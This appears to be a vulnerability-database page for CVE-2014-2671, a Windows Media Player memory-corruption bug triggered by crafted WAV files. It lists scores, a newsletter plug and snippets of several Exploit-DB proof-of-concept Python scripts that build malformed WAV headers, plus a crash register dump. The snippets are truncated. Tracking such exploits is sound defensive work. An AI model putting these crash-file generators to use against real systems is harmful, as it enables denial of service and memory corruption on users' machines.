CVE-2014-2671
published 2014-03-31CVE-2014-2671: Microsoft Windows Media Player (WMP) 11.0.5721.5230 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other…
PriorityP347medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
46.29%
98.7th percentile
Microsoft Windows Media Player (WMP) 11.0.5721.5230 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted WAV file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_media_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)
GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://converter.gomlab.com/
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
print"###########################################################"
print"# Title: GOMVC 1.1.0.60 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\
Exploit-DB
jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)
exploitdb·2014-03-24
CVE-2014-2671 jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)
jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: jetVideo 8.1.1 Basic (.wav) Local Crash PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.jetaudio.com/download/jetvideo.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: Light jetVideo 8.1.1 Basic (.wav) Local Crash PoC#"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65
Exploit-DB
GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)
GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://player.gomlab.com/eng/
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
print"###########################################################"
print"# Title: GOMMP 2.2.56.5183 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x6
Exploit-DB
Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)
Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: WMP 11.0.5721.5230 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\
Exploit-DB
Light Audio Player 1.0.14 - Memory Corruption (PoC)
exploitdb·2014-03-24
CVE-2014-2671 Light Audio Player 1.0.14 - Memory Corruption (PoC)
Light Audio Player 1.0.14 - Memory Corruption (PoC)
---
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x
Exploit-DB
Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)
exploitdb·2013-07-18
CVE-2014-2671 Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)
Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)
---
# Exploit Title: Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC
# Date: 16-07-2013
# Exploit Author: ariarat
# Vendor Homepage: http://www.microsoft.com
# Software Link: included in windows xp sp2 and sp3
# Version: 2.1.4026.0
# Tested on: [ Windows XP sp3]
# CVE : 2013-4858
#============================================================================================
# Open Windows movie maker in left panel click on "Import audio or music" and choose movieMaker.wav
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email : [email protected]
#===========================================
Exploit-DB
Microsoft PowerPoint 2007 - Crash (PoC)
exploitdb·2013-07-01
CVE-2014-2671 Microsoft PowerPoint 2007 - Crash (PoC)
Microsoft PowerPoint 2007 - Crash (PoC)
---
# Title : Microsoft Office PowerPoint 2007 Crash PoC
# Date: 2013-01-12
# Software Link: http://office.microsoft.com/
# Author: Asesino04
# Tested on: Windows XP SP2
# Special Thanks To : Ness Oum El Bouaghi
# Bug Description:
when you insert a sound to Microsoft office powerpoint 2007 ;the software will get crashed
it tested on office 2007 ,all the versions may be affected too
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Proof Of Concept
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg
/-->
EAX FFFFFFFF
ECX 00000000
EDX 00000000
EBX 0003DAD8
ESP 0013BC5C
EBP 0013BCF0
ESI FFFFFFFF
EDI 00199FF2
EIP 0460E650 quartz.0460E650
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(
No writeups or analysis indexed.
http://packetstormsecurity.com/files/125834http://www.exploit-db.com/exploits/32477/http://www.securityfocus.com/bid/66403https://exchange.xforce.ibmcloud.com/vulnerabilities/92080http://packetstormsecurity.com/files/125834http://www.exploit-db.com/exploits/32477/http://www.securityfocus.com/bid/66403https://exchange.xforce.ibmcloud.com/vulnerabilities/92080
2014-03-31
Published